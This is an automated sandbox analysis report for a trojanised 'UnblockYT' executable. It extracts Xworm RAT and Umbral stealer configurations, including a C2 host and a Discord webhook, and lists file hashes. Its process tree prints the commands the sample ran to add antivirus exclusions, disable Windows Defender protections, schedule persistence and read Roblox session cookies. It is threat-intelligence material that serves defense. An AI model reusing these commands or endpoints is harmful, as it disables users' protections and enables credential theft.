Analysis

  • max time kernel
    171s
  • max time network
    188s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-08-2024 09:06

General

  • Target

    UnblоckYT .exe

  • Size

    2.0MB

  • MD5

    9507d39a1268cc9bc49a89a5b6b1efde

  • SHA1

    62919a92df361ec9f797066b8fd025d7e07c2795

  • SHA256

    d815fcc722bee4f1025644dce314ce8c0b41d05491fd1e3c382a3b403564075f

  • SHA512

    ffd75d68a7e8025c11922681b3214a8c96d70f7fd30f6eb7f6429e3865113f5406cc33ac76cd1580c03b64a52ff846c2c6e8d75968876ab7ac0625dd4873bbc0

  • SSDEEP

    49152:jDjlabwz9heWYJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:PqwuWYKeTv0q8bG55v3q5

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1269943614985863178/Snv_QcCVwSIoYNJg4xeEatpV3Q1YTnWJobZDi7PbgCWJqJTv3OWTmQttxL-3iAWsDAxu

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 10 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, the web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Uses the powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 10 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
    "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1452
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2112
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe
            "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe"
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
            • C:\Windows\system32\attrib.exe
              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe"
              6⤵
              • Views/modifies file attributes
              PID:1760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2688
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3032
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:352
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
              PID:2648
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:848
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              6⤵
              • Detects videocard installed
              PID:1988
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe" && pause
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:1792
              • C:\Windows\system32\PING.EXE
                ping localhost
                7⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1768
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2628
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2876
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2236
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2028
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:640
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1732
          • C:\Windows\system32\timeout.exe
            timeout /t 1 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1764
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:964
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1180
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1580
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {3E6C02F3-4C82-40C2-AC8A-A0A49B0ED0D1} S-1-5-21-2257386474-3982792636-3902186748-1000:CTBHAMHL\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2284
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2492
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1324
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2464

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      54cd9049ed58cfe384f4fd85f053f57d

      SHA1

      66ef83a2d5e6a90ade2805e9ee19890182dac48c

      SHA256

      4f6b495e2ef241485fb886d41cc95847d8bf29a0ac5faaabaaecb27bf90542d9

      SHA512

      9ae134d6c2ef51b324a114a0dbbcc66784ee26032633695e5523d617e7ca2e7df2ba2c2b4cdae535540313d9d3fe8742d7da944381b539a241db29000f39352f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      4badba267270501c8bf7cdb3f814ee13

      SHA1

      3a92c4298c16154efc05c0dd184b1c042c0da56f

      SHA256

      047fdd85067ddf235b9fac73b74565ebbf6f950ddc1955fe420baa214ce45816

      SHA512

      e3541c1b3c8a72867434fe8940598f7e1709e63116a1b30a7618420bd960d7e32f1eceef67fd6bf99a2c115cdbe967ade0e2e01c6992aa39a6e44450597f8fa6

    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe

      Filesize

      1.8MB

      MD5

      ddf02dfa6df9ee4e157d675e55a055c7

      SHA1

      d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

      SHA256

      6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

      SHA512

      79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

    • C:\Users\Admin\AppData\Roaming\YTunblock.exe

      Filesize

      1.2MB

      MD5

      5c130e0ea8b936a34372663dd763f722

      SHA1

      cbb1efd33b28851682ae3f9699c79ffe705c780d

      SHA256

      262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

      SHA512

      a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

    • C:\Users\Admin\AppData\Roaming\ .bat

      Filesize

      1KB

      MD5

      5807f01368bda72ebd943e8755fa2e0c

      SHA1

      f42940149bf0e256b14343c87f750c6cdac8ae72

      SHA256

      9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

      SHA512

      31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

    • \Users\Admin\AppData\Local\Temp\mnhnvy.exe

      Filesize

      229KB

      MD5

      fed4a7197948ba327337b612254a673b

      SHA1

      2d1a9070dac7754ec592768654574fb933ec3730

      SHA256

      2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

      SHA512

      51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

    • \Users\Admin\AppData\Roaming\YTunblock.sfx.exe

      Filesize

      1.6MB

      MD5

      10aefe8560bf4e437d2f47bd469a59ff

      SHA1

      57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

      SHA256

      56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

      SHA512

      d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

    • memory/1324-153-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/1324-151-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/1324-152-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/1324-156-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/1724-43-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

    • memory/1724-74-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

    • memory/1724-69-0x0000000002620000-0x0000000002630000-memory.dmp

      Filesize

      64KB

    • memory/1724-45-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

    • memory/1916-87-0x00000000022A0000-0x00000000022A8000-memory.dmp

      Filesize

      32KB

    • memory/1916-86-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/2032-93-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2032-94-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

    • memory/2284-119-0x00000000001F0000-0x00000000005A2000-memory.dmp

      Filesize

      3.7MB

    • memory/2284-75-0x00000000001F0000-0x00000000005A2000-memory.dmp

      Filesize

      3.7MB

    • memory/2380-81-0x00000000012C0000-0x0000000001300000-memory.dmp

      Filesize

      256KB

    • memory/2464-128-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/2464-129-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/2464-132-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/2464-133-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/2492-139-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/2492-144-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/2492-141-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

    • memory/2492-140-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB